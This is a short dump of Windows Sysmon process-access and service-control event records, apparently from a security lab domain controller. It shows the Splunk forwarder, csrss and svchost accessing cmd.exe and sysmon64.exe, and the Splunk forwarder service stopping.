{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3408,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.148\r\nSourceProcessGUID: {E2A3D6B1-10FF-5F25-0000-0010D8570500}\r\nSourceProcessId: 4864\r\nSourceThreadId: 4872\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-0010A76F0500}\r\nTargetProcessId: 2552\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+13ac4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+12176|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+19082|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+d94e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.148","SourceProcessGUID":"{E2A3D6B1-10FF-5F25-0000-0010D8570500}","SourceProcessId":"4864","SourceThreadId":"4872","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010A76F0500}","TargetProcessId":"2552","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+13ac4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+12176|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+19082|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+d94e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3409,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.148\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-0010A76F0500}\r\nTargetProcessId: 2552\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.148","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010A76F0500}","TargetProcessId":"2552","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3410,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.148\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.148","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3411,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.148\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.148","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3412,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.148\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.148","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76854,"ProcessID":852,"ThreadID":1116,"Channel":"System","Message":"The SplunkForwarder Service service entered the stopped state.","param1":"SplunkForwarder Service","param2":"stopped","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76855,"ProcessID":852,"ThreadID":936,"Channel":"System","Message":"The SplunkForwarder Service service entered the stopped state.","param1":"SplunkForwarder Service","param2":"stopped","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3413,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.148\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.148","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3414,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.148\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.148","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3415,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.148\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.148","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
